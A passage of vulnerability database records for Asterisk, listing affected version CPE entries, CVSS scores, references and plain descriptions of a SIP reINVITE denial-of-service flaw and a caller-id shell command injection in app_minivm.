              "matchCriteriaId": "DEBB0786-D912-48D1-BC63-E0F87E078154",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1C39DD70-1220-4CC6-95B4-CE18CA5787CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B0005F0B-9C87-4160-9416-A7C136FCD5AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "12073B6A-14B1-490B-B267-A68194C68BDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "198C92F2-8268-4045-B297-17E0D1F9726E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "5D3A3C00-EA83-4EF4-8681-DB5616132607",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "5FE59F0F-44B0-4940-8368-F360EE610114",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "3647F0E3-196F-486B-9BAB-75ED24A055ED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1FBC4A5F-FB16-42B2-9689-25F8B3D0F521",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B788D6E2-78E8-4DE1-81F5-40D52263E7F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "51358F60-4D6C-4DBA-86B0-E12C48A67456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "D51C9952-97F4-4326-8F7D-34579D3686AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "3711A75C-AF87-4A5C-8B35-1CF834C12D2A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E7FFD09D-21A3-4E98-B1FA-C7A16C243D91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "FAC6591A-BC5A-4CA9-90BC-0B686F74127B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "01BAF29D-8679-40F3-AB6C-DA5C3787271C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "B42229C3-B18E-4D50-9B98-202CB1805CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "15DF192B-A8D5-4FCC-B469-505A8FA11D00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "D24E01F7-604D-4D05-B698-3BDEF7B69EF8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "A54A74F4-8A6C-4090-88C2-8AB5A606C59B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687ED3CE-67C4-410D-8AF4-C769015598F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "30E918CD-89C4-42DA-9709-E50E0A3FA736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "DA57FA15-D0D7-4A97-9C25-6F6566940098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1C45300-A2CF-40E7-AB67-23DC24C31A1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "958081DC-1D77-45CD-A940-C7A1AB42C7BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "298A879D-4F65-4523-A752-D17C4F81B822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AB07BE-54C4-4972-A05F-D1E2CF4363CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EBC63564-A84E-463D-8312-DDF1C6B7796F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "62A0906E-B631-4F3A-9ABC-9A43A43220BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C6314ADA-2849-416D-966E-C01C322EF904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B6CB1DD-614A-4B3D-99AE-9B1341427024",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC95B04F-3746-4F1C-8428-A1FA10253E14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "20819080-E0AB-4879-B4CF-A154D6F7EF6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6C45753-E2CC-4F7C-B8DA-3D8CF255EA22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5A080197-D6AA-4FDC-888E-51D1C8251E34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "1F08D930-D4C1-4C63-875C-171C46AE97C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AA43D7D-AEAD-47CB-BFA5-B73004A1A7A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "B5ED5F6F-166D-4610-8939-A33AD45F1ADE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D40002A-564E-425C-BA2A-7C4A8F8DAFD7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "521C4DB2-7127-4BA9-94FC-AB0E9E06FE2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8C905DC1-8AB8-4D83-BB5B-FA4DABC58229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "ECC74B5D-97A1-46FF-AFA3-5D5E4A0BF3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2D98C7C-94A8-4348-AF22-04A41FB6F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "85D39A99-E9A6-4860-BC61-56CA2FC3238B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "845DA0A4-1983-4E82-99C8-B7FBF47C632E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A63FBB7-F1CF-4603-848F-980742D2ED36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10B2084F-3AF4-4008-899C-6C1E43715201",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "217C13A5-9F8A-4392-858F-2FC88B03EB0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B282462-900C-492E-98DE-65364E62F5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687784F0-9ACC-435D-81F9-1E1B0F61010C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9D7D020C-FE32-408B-BE37-58835FD3D95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "39B7938F-7370-4F67-B0CD-1C14DE2E4E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC587195-5973-423B-8BF9-3E0B27363B76",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "82F91FE8-C320-466B-AF08-67319A00A2BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "DCFF0E1C-B455-4C18-8AA1-10408234327B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Asterisk Business Edition C.3.x before C.3.7.5, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones does not properly handle a provisional response to a SIP reINVITE request, which allows remote authenticated users to cause a denial of service (RTP port exhaustion) via sessions that lack final responses."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source v1.8.x anterior a v1.8.13.1 y v10.x anterior a v10.5.2, Asterisk Business Edition vC.3.x anterior a vC.3.7.5, Certified Asterisk v1.8.11-certx anterior a v1.8.11-cert4, y Asterisk Digiumphones v10.x.x-digiumphones anterior a v10.5.2-digiumphones no maneja una respuesta provisional a una petici\u00f3n SIP reINVITE de forma adecuada, lo que permite a atacantes remotos autenticados provocar una denegaci\u00f3n de servicio (agotamiento de puerto RTP) a trav\u00e9s de sesiones que carecen de repuestas finales."
    }
  ],
  "id": "CVE-2012-3863",
  "lastModified": "2024-11-21T01:41:45.430",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2012-07-09T10:20:44.823",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-010.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/50687"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/50756"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2012/dsa-2550"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/54327"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-19992"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2012-010.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/50687"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/50756"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2012/dsa-2550"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/54327"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-19992"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-09-02 16:29

Modified

2024-11-21 03:12

Severity ?

9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

In Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized command execution is possible. The app_minivm module has an "externnotify" program configuration option that is executed by the MinivmNotify dialplan application. The application uses the caller-id name and number as part of a built string passed to the OS shell for interpretation and execution. Since the caller-id name and number can come from an untrusted source, a crafted caller-id name or number allows an arbitrary shell command injection.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2017-006.html	Vendor Advisory
cve@mitre.org	http://www.debian.org/security/2017/dsa-3964
cve@mitre.org	http://www.securitytracker.com/id/1039252	Third Party Advisory, VDB Entry
cve@mitre.org	https://bugs.debian.org/873908	Issue Tracking, Patch, Third Party Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27103	Issue Tracking, Patch, Third Party Advisory
cve@mitre.org	https://security.gentoo.org/glsa/201710-29
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2017-006.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2017/dsa-3964
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1039252	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://bugs.debian.org/873908	Issue Tracking, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27103	Issue Tracking, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://security.gentoo.org/glsa/201710-29

Impacted products

Vendor	Product	Version
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.0.2
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.1
digium	asterisk	13.2.0
digium	asterisk	13.2.0
digium	asterisk	13.2.1
digium	asterisk	13.3.0
digium	asterisk	13.3.2
digium	asterisk	13.4.0
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.1
digium	asterisk	13.7.2
digium	asterisk	13.8.0
digium	asterisk	13.8.0
digium	asterisk	13.8.1
digium	asterisk	13.8.2
digium	asterisk	13.9.0
digium	asterisk	13.9.1
digium	asterisk	13.10.0
digium	asterisk	13.10.0
digium	asterisk	13.11.0
digium	asterisk	13.11.1
digium	asterisk	13.11.2
digium	asterisk	13.12
digium	asterisk	13.12.0
digium	asterisk	13.12.1
digium	asterisk	13.12.2
digium	asterisk	13.13
digium	asterisk	13.13.0
digium	asterisk	13.13.1
digium	asterisk	13.14.0
digium	asterisk	13.14.0
digium	asterisk	13.14.0
digium	asterisk	13.14.1
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.1
digium	asterisk	13.16.0
digium	asterisk	13.16.0
digium	asterisk	13.16.0
digium	asterisk	13.17.0
digium	asterisk	13.17.0
digium	asterisk	14.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.1
digium	asterisk	14.0.2
digium	asterisk	14.1
digium	asterisk	14.01
digium	asterisk	14.1.0
digium	asterisk	14.1.1
digium	asterisk	14.1.2
digium	asterisk	14.02
digium	asterisk	14.2
digium	asterisk	14.2.0
digium	asterisk	14.2.1
digium	asterisk	14.3.0
digium	asterisk	14.3.0
digium	asterisk	14.3.0
digium	asterisk	14.3.1
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.1
digium	asterisk	14.5.0
digium	asterisk	14.5.0
digium	asterisk	14.5.0
digium	asterisk	14.6.0
digium	asterisk	14.6.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.1
digium	asterisk	11.2.2
digium	asterisk	11.4.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.1
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	11.10.1
digium	asterisk	11.10.1
digium	asterisk	11.10.2
digium	asterisk	11.11.0
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.0
digium	asterisk	11.12.1
digium	asterisk	11.13.0
digium	asterisk	11.13.0
digium	asterisk	11.13.1
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.1
digium	asterisk	11.14.2
digium	asterisk	11.15.0
digium	asterisk	11.15.0
digium	asterisk	11.15.1
digium	asterisk	11.16.0
digium	asterisk	11.17.0
digium	asterisk	11.17.1
digium	asterisk	11.18.0
digium	asterisk	11.18.0
digium	asterisk	11.19.0
digium	asterisk	11.20.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	11.21.1
digium	asterisk	11.21.2
digium	asterisk	11.22.0
digium	asterisk	11.22.0
digium	asterisk	11.23.0
digium	asterisk	11.23.0
digium	asterisk	11.23.1
digium	asterisk	11.24.0
digium	asterisk	11.24.1
digium	asterisk	11.25.0
digium	asterisk	11.25.1
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13
digium	certified_asterisk	13.13

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "E7D1238A-A8D2-485E-81FD-46038A883EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "E93A7967-9A04-424A-BDDB-A2B8289B9AC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "8F75C9FF-6F95-4F6A-B683-FE2BEDE3AD10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "68226156-42ED-4F0E-93E1-02DD57E582B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A4EB385E-28B5-4259-9431-99E1F32D61B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "121EACD3-D5E3-4691-8024-95996865BB65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "74B23D17-7356-4D37-8C73-E87896D1335B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CEA9DA4A-A3E6-4C46-9471-CCBFA71083AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "81A8A6CB-D236-4AB3-8476-C2D34DB7EF31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B55719B3-7325-47E1-8D16-3F34B1F44385",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C91E9A3B-54EB-4819-94DD-30F7D0C90047",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47189DF9-8E57-4BA6-9F52-B7A8229AE02A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "84AAFA3C-3CCD-4615-9725-169C303CF18F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C92E0801-9E8F-4CF2-A4A0-48BCF550F2D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C1C39FA-EF1A-4F2B-87A0-A00BAE73C6A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "677D1211-0B07-47B9-AB7A-E820E2B29561",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "84202BAF-29E1-472B-B11F-B73F6A8891CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FFC7120D-E6A0-4801-A1CC-3E143896EE72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "BAF2A83D-D9AE-441D-8D4E-335BF9D28A63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F5C1479-A540-4B7D-B00C-BD35EEC83BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC12556C-5E82-47D7-87E5-FBDC01A920DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "461C1D2D-C4C1-4FF8-8231-38A2505F3523",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "66595711-8573-4A9B-A8FE-4943E3097AA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FE3D4-A0B9-475A-9B89-B0222283A6A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9670B5AC-CBD1-484C-90F8-69B1A60B6054",
              "vulnerable": true
            },
            {
